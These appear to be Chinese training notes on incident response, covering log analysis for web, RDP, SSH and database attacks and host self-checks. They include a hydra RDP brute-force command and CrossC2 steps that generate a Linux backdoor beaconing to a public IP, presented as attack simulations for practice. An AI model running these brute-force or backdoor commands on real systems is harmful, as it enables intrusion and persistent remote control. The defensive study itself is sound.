目的:分析攻击时间、攻击操作、攻击结果、安全修复等并给出合理的解决方案 保护阶段:直接断网,保护现场,看是否能够恢复数据 分析阶段:对入侵过程进行分析,常见方法为指纹库搜索、日志时间分析、后门追查分析、漏洞检查分析等 复现阶段:还原攻击过程,模拟攻击者入侵思路,关注攻击者在系统中应用的漏洞、手法 修复阶段:分析原因后,修补相关系统、应用漏洞,如果存在后门或弱口令,及时清除并整改 建议阶段:对攻击者利用的漏洞进行修补,加强系统安全同时提高安全意识
1、熟悉常用的web安全攻击技术 2、熟悉相关日志启用以及存储查看等 3、熟悉日志中记录数据分类和分析等
1、收集目标服务器信息 2、部署相关分析软件和平台等 3、整理相关安全渗透测试工具指纹库 4、针对异常表现第一时间触发思路
从受害方提供的信息预估入侵面以及权限面进行排查,分为有明确信息和无明确信息两种情况:1、如果有明确信息的情况下,基本上会提出关于时间、操作以及指纹这一类的相关信息
2、如果无明确信息的情况下,那么就需要排查全部可能入侵的手法:
1、查询IIS日志文件存放位置
2、根据网站的ID号寻找对应的日志
3、找到日志后查看攻击语句
4、根据指纹判断攻击所采用的了何种攻击
1、在宝塔面板中下载日志至本地
2、分析日志,查看工具指纹和攻击请求IP,锁定攻击IP
3、宝塔自带后门查杀
360星图
其他好用的工具还有ELK、Splunk、FileSeek。其中ELK和Splunk部署相对比较麻烦。
暴力破解:针对系统有包括rdp、ssh、telnet等,针对服务有包括mysql、ftp等,一般可以通过超级弱口令工具、hydra进行爆破 漏洞利用:通过系统、服务的漏洞进行攻击,如永恒之蓝等 流量攻击:主要是对目标机器进行dos攻击,从而导致服务器瘫痪 木马控制:主要分为webshell和PC木马,webshell是存在于网站应用中的,而PC木马是进入系统进行植入的。目的是对系统进行持久控制 病毒感染:主要分挖矿病毒、蠕虫病毒、勒索病毒等,对目标文件或目录进行加密,用户需要支付酬金给黑客
账户:账户异常、账户增加,看攻击者是否留有后门账户 端口:异常端口开放,看是否与外部地址的某个端口建立了连接 进程:异常进程加载,看是否存在异常进程执行(排除系统正常进程) 网络:网络连接异常,看是否对局域网内其他IP地址进行请求(横向)或自身网络异常 启动:异常程序开机自启动,看是否存在开机自启动的程序,排查是否为恶意程序 服务:异常服务添加、启动,看机器上是否存在异常服务(排除系统正常服务) 任务:异常定时任务执行,看机器上是否存在定时任务 文件:异常文件,看机器上是否存在异常文件,如后门、病毒、木马等
(1)windows
事件查看器》windows日志(包括应用程序、安全、Setup、系统、事件)
(2)linux
cd /var/log
https://xz.aliyun.com/t/485
https://www.secpulse.com/archives/114019.html https://docs.microsoft.com/en-us/sysinternals/
通过kali模拟攻击对rdp服务进行暴力破解
hydra -l mac -P /usr/share/wordlists/metasploit/password.lst rdp://172.16.54.42 -s 3389 -vV
(1)手动查看RDP
在win系统中需开启审核策略(成功、失败),同时查看windows日志,关注事件归类、事件ID、事件状态等
可以发现爆破账户为mac,黑客主机名为kali
(2)工具查看RDP
对SSH进行爆破 1、统计了下日志,确认服务器遭受多少次暴力破解
grep -o "Failed password" /var/log/secure|uniq -c
2、输出登录爆破的第一行和最后一行,确认爆破时间范围
grep "Failed password" /var/log/secure|head -1 grep "Failed password" /var/log/secure|tail -1
3、进一步定位有哪些 IP 在爆破?
grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[04][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][09]?)"|uniq -c | sort -nr
4、爆破用户名字典都有哪些?
grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort nr
5、登录成功的日期、用户名、IP
grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}' grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more
windows:默认配置测试 注:windows高版本网络信息获取不全(win2012及以上)
linux:借助 CrossC2 项目
netstat -ntulp
https://github.com/gloxec/CrossC2
https://github.com/darkr4y/geacon
参考过程:http://www.adminxe.com/1287.html
1.项目上传至CS服务端目录,给予执行权限
2.配置监听器:监听器为windows/beacon_https/reverse_https 注:如果是阿里云记得端口放行,同时需要关闭linux默认防火墙
3.生成后门:
./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2
通过网络监听工具及 windows 日志分析或执行记录查找后门问题
详细说明中毒表现及恢复指南
https://lesuobingdu.360.cn/
https://www.nomoreransom.org/zh/index.html
Gscan 多重功能脚本测试-Linux
python3 GScan.py
https://xz.aliyun.com/t/485 https://lesuobingdu.360.cn/ https://github.com/gloxec/CrossC2/ https://github.com/darkr4y/geacon/ https://github.com/grayddq/GScan/ https://bbs.pediy.com/thread-217586-1.htm https://www.nomoreransom.org/zh/index.html https://docs.microsoft.com/en-us/sysinternals/ https://www.secpulse.com/archives/114019.html
#网盘链接 失效不补https://pan.baidu.com/s/1tQS1mUelmEh3I68AL7yXGg 提取码:xiao
1、第三方应用由于是选择性安装,如何做好信息收集和漏洞探针也是获取攻击者思路的重要操作,除去本身漏洞外,提前预知与口令相关的攻击也要进行筛选。2、排除第三方应用攻击行为,自查漏洞分析攻击者思路,人工配合工具脚本 3、由于工具和脚本更新迭代快、分类复杂,那么打造自己的工具箱迫在眉睫
如果是阿里云主机需要开放端口并关闭防火墙 1、下载并解压neo4j 下载地址:https://github.com/JPCERTCC/LogonTracer
git clone https://github.com/neo4j/neo4j
tar -zvxf neo4j-community-4.2.1-unix.tar
2、安装java11环境
sudo yum install java-11-openjdk -y
3、修改neo4j配置保证外部访问
dbms.connector.bolt.listen_address=0.0.0.0:7687
4、开启neo4j
./bin/neo4j console &
截屏2021-08-22 上午8.39.54
5、下载Logontracer并安装库
git clone https://github.com/JPCERTCC/LogonTracer.git
pip3 install -r requirements.txt
6、启动Logontracer并导入日志分析文件
python3 logontracer.py -r -o [PORT] -u [USERNAME] -p [PASSWORD] -s [IP 地址]
python3 logontracer.py -r -o 8080 -u neo4j -p xiaodi -s 47.98.99.126
截屏2021-08-22 上午8.42.20
python3 logontracer.py -e [EVTX 文件] -z [时区] -u [用户名] -p [密码] -s [IP 地址]
python3 logontracer.py -e Security.evtx -z -13 -u neo4j -p xiaodi -s 127.0.0.1
截屏2021-08-22 上午8.46.16
7、刷新访问LogonTracer-web_gui,查看分析结果
常见的数据库攻击包括弱口令、SQL注入、提升权限、窃取备份等,对数据库日志进行分析,可以发现攻击行为,进一步还原攻击场景和溯源攻击源
(1)Mysql
1、日志启用并查看
show variables like "%gengeral";
SET GLOBAL general_log = 'On';
# 这里可以设置mysql日志存放目录
SET GLABAL general_log_file = '/var/lib/mysql/mysql.log'
2、通过超级弱口令工具(snetcraker)对目标进行爆破模拟攻击
3、查看日志并分析
(2)Mssql
1、查看日志
2、配置跟踪文件
3、对Mssql进行攻击并实时查看日志
主要针对以下两种情况:
(1)系统漏洞自查(win、lin)
主要工具为WindowsvulnScan、linux-exploit-suggester
1、windows自查
D:\Myproject\venv\Scripts\python.exe cve-check.py -C -f KB.json
如果出现报错,将KB.json切换为utf-8模式
2、linux自查
./linux-exploit-suggester.sh
工具地址 https://github.com/chroblert/WindowsVulnScan https://github.com/mzet-/linux-exploit-suggester
(2)服务漏洞自查
1、Windows
Get-WmiObject -class Win32_Product
2、Linux 地址:https://github.com/rebootuser/LinEnum
./LinEnum.sh
3、根据检索出来的服务进行漏洞扫描 主要使用searchsploit,比如weblogic
searchsploit weblogic
其中查询的漏洞分别为dos、local、remote、webapps
地址:https://github.com/diogo-fernan/ir-rescue
主要用于打造自己的应急工具箱